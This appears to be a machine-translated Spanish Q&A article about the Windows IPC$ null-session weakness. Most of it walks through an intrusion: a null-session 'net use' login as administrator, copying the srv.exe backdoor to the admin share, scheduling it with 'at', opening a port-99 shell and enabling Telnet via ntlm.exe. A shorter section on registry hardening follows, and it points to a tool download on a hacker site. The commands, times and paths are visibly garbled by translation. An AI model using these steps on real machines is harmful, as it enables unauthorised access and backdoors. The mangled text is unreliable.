Estoy usando winxp. ¿Qué pasará si se prohíben las conexiones nulas ipc$?

IPC es * * * un recurso que disfruta de "canalizaciones con nombre" y es muy importante para la comunicación entre programas. Se utiliza cuando se administra una computadora de forma remota y se visualizan los * * * recursos de la computadora. A través de IPC, podemos establecer una conexión vacía con el host de destino (no se requieren nombre de usuario ni contraseña). A través de esta conexión vacía, también podemos obtener la lista de usuarios en el host de destino. Sin embargo, algunas personas con motivos ocultos utilizarán IPC para encontrar nuestra lista de usuarios y utilizarán algunas herramientas de diccionario para atacar a nuestro host.

Cómo explotar las vulnerabilidades de IPC

Los atacantes suelen utilizar el software Streamer aquí. Rabbit está aquí para recordarles a todos que Streamer es un software muy potente. ¡No se debe destruir ilegalmente!

{Graph =0}

Paso 1: Ejecute Streamer (la última versión es 4.6) y presione "CTRL+R" para que aparezca el cuadro de escaneo. Solo estamos haciendo una prueba aquí para informarle el daño de esta vulnerabilidad, por lo que ahora seleccionamos aleatoriamente una IP para escanear. El que escaneamos es 127.0.0.1 (como se muestra en la imagen), los demás son predeterminados y no es necesario cambiar ninguna configuración.

Paso 2: Abra el símbolo del sistema que viene con Win2000. Nota: Esto no es para enseñarle cómo romperlo, sino para presentarle el daño de esta vulnerabilidad, por lo que la IP a continuación es hipotética y no existe.

1.c:\>net use \ \ 127 . Direcciones IP con nombres de usuario de administradores y contraseñas de "vacías". Si se trata de un atacante, utilizará este comando para establecer una conexión con 127.0.0.1. Debido a que la contraseña está "vacía", no es necesario ingresar la primera comilla, el nombre de usuario está entre las siguientes comillas dobles. Ingresar.

2.c:\ & gt; Copiar srv.exe \ \ 127 0 1 \ admin

Copie srv.exe, que se puede encontrar en Herramientas. directorio de Streamer Find (aquí se refiere al C:\winnt\system32\del usuario administrador. También puede usar C y D, es decir, la unidad C y la unidad D, dependiendo de dónde desee copiar).

3.c:\ & gt;Tiempo neto\\127.0.0.1

Verifique la hora y descubra que la hora actual de 127.0.0.1 es 165438 + 0:00 am en Marzo de 2002. El comando se completó con éxito.

4.c:\>srv.exe time\ \ 127. 0. 0. 11:05

Utilice el comando at para iniciar srv.exe (la hora establecida aquí es El tiempo del host es rápido; de lo contrario, ¿cómo puedo iniciarlo? )

5.c:\ & gt;Tiempo neto\\127.0.0.1

Verifique nuevamente. ¿Has encontrado el tiempo? Si la hora actual de 127.0.0.1 son las 11:05 am del 19/3/2002, prepárese para iniciar el siguiente comando.

6.c:\>Inicio de sesión remoto 127.0.0.1 99

Aquí se utilizará el comando Telnet. Tenga en cuenta que el puerto es 99. El puerto predeterminado de Telnet es 23, pero usamos SRV para crear un shell del puerto 99 en otra computadora.

Aunque podemos usar Telnet, SRV es de un solo uso y se activará la próxima vez que inicies sesión. ¡Así que configuraremos un servicio Telnet! Esto copiará ntlm.exe usando ntlm

7.c:\>\\127.0.0.1\admin

Use el comando Copiar para cargar ntlm.exe al Host (ntlm. exe también se encuentra en el directorio de herramientas del Streamer).

8.c:\WINNT\system32>ntlm

Ingrese el inicio de ntlm (aquí está c:\winnt\system32>; se refiere a la computadora de la otra parte, ejecute ntlm De hecho, deje esto programa ejecutado en la computadora de la otra parte). Cuando aparece "DONE", significa que ha comenzado normalmente. Luego utilice "net start Telnet" para iniciar el servicio Telnet.

Paso 3: Usamos Telnet en la computadora de la otra parte, Telnet 127.0.0.1, y luego ingresamos el nombre de usuario y la contraseña para ingresar. ¡El funcionamiento es tan sencillo como operar en DOS!

Cómo prevenir las vulnerabilidades de IPC

Después de leer el método anterior, ¿crees que es hora de comprobar si tienes esta vulnerabilidad? Si es así, ¿por qué no llenar rápidamente este vacío legal? Ven conmigo y te enseñaremos cómo prevenir la intrusión de vulnerabilidades de IPC.

1. No se permiten conexiones vacías.

Primero ejecutamos regedit, buscamos la siguiente composición [HKEY_Local_Machine\System\Current Control Set\Control\LSA] y cambiamos el valor clave de RestrictAnonymous = DWORD a: 00000001.

2. La administración está estrictamente prohibida * * *

Del mismo modo, busque la siguiente clave de grupo [HKEY_Local_Machine\System\Current Control Set\Service\lanmanserver\Parameters], AutoShareServer =La clave El valor de DWORD se cambia a: 00000000.

El tercer paso es ir a www.heibai.net/download/show.php?. Down=1Descargar delshare.zip Esta herramienta puede eliminar automática y permanentemente los dos archivos por lotes que Windows 2000 tiene de forma predeterminada.

4. Si todavía te resulta problemático, también puedes poner "compartir red ipc /delete" en tu barra de inicio.

Por supuesto, la forma más sencilla es hacer que la contraseña sea más compleja para evitar que personas malintencionadas utilicen herramientas para descifrarla. Pero quiero recordarles que cualquier contraseña compleja se puede descifrar.